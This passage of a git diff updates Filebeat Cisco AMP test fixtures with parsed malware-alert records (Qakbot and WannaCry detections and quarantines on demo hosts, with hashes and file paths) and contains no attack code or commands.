"Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26906, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "4191700.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28140, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29393, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T14:09:00.000Z", "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", @@ -1299,6 +1553,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 65000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 33628, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:45:59.000Z", "cisco.amp.computer.active": true, @@ -1413,6 +1730,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 366000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 37453, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, @@ -1632,9 +2016,140 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", - "cisco.amp.detection_id": "6419214500913741857", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1642,10 +2157,9 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 178000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 709000000, + "event.action": "Threat Quarantined", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", @@ -1653,23 +2167,14 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 43279, + "log.offset": 45976, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1678,9 +2183,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1688,7 +2190,7 @@ ] }, { - "@timestamp": "2021-01-14T13:43:32.000Z", + "@timestamp": "2021-01-14T13:43:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1699,9 +2201,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", - "cisco.amp.detection_id": "6419214500913741856", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1709,32 +2210,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 163000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419214500913742000, + "event.id": 6419214492323807000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 44631, + "log.offset": 47096, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1743,9 +2236,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1753,7 +2243,7 @@ ] }, { - "@timestamp": "2021-01-14T13:43:30.000Z", + "@timestamp": "2021-01-14T13:43:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1764,33 +2254,50 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", "cisco.amp.detection_id": "6419214488028839966", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 447000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 916000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419214492323807000, + "event.id": 6419214488028840000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 47096, + "log.offset": 48216, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1799,6 +2306,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2021,6 +2531,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 34000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 54407, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, @@ -2367,6 +2940,122 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63166, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 64439, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:06:17.000Z", "cisco.amp.computer.active": true, diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json index b1d52f25c8a8..3e3f7423594d 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json @@ -475,6 +475,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T12:57:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462918168117000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a97fb86da4e010974860e5024137b56b", + "file.hash.sha1": "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9881, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "a97fb86da4e010974860e5024137b56b", + "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T12:32:14.000Z", "cisco.amp.computer.active": true, @@ -884,6 +951,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 772000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "input.type": "log", + "log.offset": 20427, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:58:57.000Z", "cisco.amp.computer.active": true, @@ -939,6 +1059,75 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 193000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": 